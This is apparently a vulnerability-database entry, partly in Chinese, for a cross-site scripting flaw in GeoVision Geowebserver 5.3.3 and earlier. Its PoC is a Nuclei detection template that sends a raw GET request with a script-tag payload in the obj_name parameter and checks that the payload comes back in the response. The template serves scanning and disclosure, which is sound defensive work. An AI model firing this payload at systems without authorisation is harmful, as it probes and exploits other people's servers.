geowebserver-xss: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: GeoVision Geowebserver | POC: 已公开

漏洞描述

GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.

PoC代码[已公开]

id: geowebserver-xss

info:
  name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
  author: madrobot
  severity: high
  description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: geowebserver,xss,packetstorm,vuln

http:
  - raw:
      - |
        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html
# digest: 4a0a0047304502205b5727eda0ba3daebf759641b2e907e7e2dac8406592db98063d25906ba12824022100b0b6b74743f61927150cb2229fc821c2a35f711632f2972cbd7fbd6f2c850263:922c64590222798bb761d5b6d8e72950

相关漏洞推荐